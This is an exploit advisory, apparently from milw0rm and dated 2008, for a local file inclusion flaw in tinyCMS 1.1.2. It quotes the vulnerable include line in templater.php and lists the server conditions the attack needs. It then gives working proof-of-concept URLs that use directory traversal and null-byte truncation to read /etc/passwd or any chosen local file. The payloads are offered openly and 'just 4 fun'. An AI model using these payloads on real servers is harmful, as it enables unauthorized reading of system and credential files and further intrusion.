########################################################################################
|
|
#
|
|
# Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
|
|
# Author : cOndemned [ Dark-Coders ]
|
|
# Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
|
|
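# Conditions : Magic quotes gpc = Off / Register Globals = On
#              (register_globals lets the request's config[template] value populate $config when
#               templater.php is requested directly; with magic_quotes_gpc off the trailing %00 is
#               not escaped, so it cuts off the appended '/data.php'. Null-byte truncation of paths
#               only works on PHP older than 5.3.4.)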
|
|
# Other info : Prior versions probably are vulnerable too
|
|
#
|
|
########################################################################################
|
|
|
|
Source of /modules/ZZ_Templater/templater.php
|
|
|
|
[ ... ]
|
|
|
|
17. $ftemplatedir = 'templates/'.$config['template'].'/';
|
|
18. include('templates/'.$config['template'].'/data.php'); // <--- LFI
|
|
19. if($tdata['useblocks'] == 1)
|
|
|
|
[ ... ]
|
|
|
|
|
|
Proof of Concept :
|
|
|
|
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
|
|
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
|
|
|
|
|
|
Just 4 fun
|
|
|
|
# milw0rm.com [2008-08-21]